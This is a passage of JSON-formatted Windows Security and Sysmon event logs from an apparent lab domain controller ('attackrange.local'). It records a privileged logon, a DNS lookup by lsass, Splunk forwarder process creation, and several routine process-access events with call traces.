ID:\t\t0x42839\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x42839","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2374,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.552\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.552","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.","QueryStatus":"1460","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2375,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.557\r\nProcessGuid: {E2A3D6B1-1078-5F25-0000-0010722A0400}\r\nProcessId: 2304\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nFileVersion: 8.0.2\r\nDescription: Monitor windows event logs\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winevtlog.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.557","ProcessGuid":"{E2A3D6B1-1078-5F25-0000-0010722A0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","FileVersion":"8.0.2","Description":"Monitor windows event logs","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winevtlog.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2376,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.755\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1078-5F25-0000-0010722A0400}\r\nTargetProcessId: 2304\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.755","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1078-5F25-0000-0010722A0400}","TargetProcessId":"2304","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2377,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.755\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1078-5F25-0000-0010722A0400}\r\nTargetProcessId: 2304\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.755","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1078-5F25-0000-0010722A0400}","TargetProcessId":"2304","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2378,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2379,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2380,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2381,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2382,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 